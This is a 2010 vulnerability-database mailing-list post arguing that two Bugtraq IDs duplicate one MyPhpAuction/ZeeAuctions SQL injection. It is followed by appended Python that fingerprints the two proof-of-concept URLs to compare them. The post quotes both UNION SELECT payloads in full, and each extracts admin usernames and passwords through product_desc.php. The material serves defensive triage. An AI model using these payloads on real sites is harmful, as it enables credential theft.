[VIM] Bugtraq Ids 37702 vs 43591
George A. Theall
theall at tenable.com
Thu Sep 30 11:40:51 CDT 2010
The newly-created Bugtraq Id 43591 covers a SQL injection in a product
named MyPhpAuction -- apparently user input to the 'id' parameter of
'product_desc.php' is not sanitized before being used in a
database query. SecurityFocus gives as a PoC:
http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
Notice the "zeeauctions_admin"? Looks like the product is just a
rebranded version of that, no? And indeed, if you go to the product
page (http://galaxyscriptz.com/products/MyPhpAuction-2010.html),
you'll notice the demo links to http://www.canadianelitehosting.com/Demos/ZeeAuctions/,
which appears to be that based on its banner.
Given this, the BID seems to be a dup of BID 37702, which gives as a
PoC:
http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm
I'm not clear about the attribution, but this seems to correspond to
EDB Id 11047 although it's been truncated (cut-and-paste error?).
Taking this into consideration, these two BIDs seem to be duplicates.
Rob, did you guys at SecurityFocus look into this at all?
George
--
theall at tenablesecurity.com
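As an added illustration (not part of George's message, nor SecurityFocus or EDB tooling), the normalisation an analyst can apply before calling two PoCs duplicates: strip comment-style whitespace and %-encoding, then compare the script, parameter, column count, fields read and table name, tolerating the truncated table name in the BID 37702 entry. The two URLs are the ones quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qs
from posixpath import basename

# The two PoC URLs quoted in the message, copied verbatim (the second one is
# truncated in the original report, as noted above).
POC_BID_43591 = "http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--"
POC_BID_37702 = "http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm"

def split_top_level(expr):
    """Split a select list on commas that are not inside parentheses."""
    parts, depth, cur = [], 0, ""
    for ch in expr:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append(cur.strip())
            cur = ""
        else:
            cur += ch
    parts.append(cur.strip())
    return parts

def fingerprint(url):
    """Reduce a PoC URL to the features that identify the underlying bug:
    vulnerable script, injected parameter, column count, fields read and
    table referenced. /**/ comments and %-encoding are normalised away."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx and '+'
    param, value = next(iter(query.items()))
    s = re.sub(r"/\*.*?\*/", " ", value[0])               # /**/ -> whitespace
    s = re.sub(r"\s+", " ", s).strip().lower().rstrip("-").strip()
    m = re.search(r"select (.*) from (\S+)", s)
    select_list, table = m.group(1), m.group(2)
    # identifiers named inside concat(...), ignoring the hex separator literals
    fields = [f for f in re.findall(r"concat\((.*?)\)", select_list)[0].split(",")
              if not re.fullmatch(r"0x[0-9a-f]+|\d+", f)]
    return {"script": basename(parts.path), "param": param,
            "columns": len(split_top_level(select_list)),
            "fields": fields, "table": table}

def likely_duplicates(url_a, url_b):
    """True when both PoCs hit the same script/parameter with the same column
    count and fields; one table name may be a truncated prefix of the other."""
    a, b = fingerprint(url_a), fingerprint(url_b)
    same_table = a["table"].startswith(b["table"]) or b["table"].startswith(a["table"])
    return same_table and (a["script"], a["param"], a["columns"], a["fields"]) == \
                          (b["script"], b["param"], b["columns"], b["fields"])
```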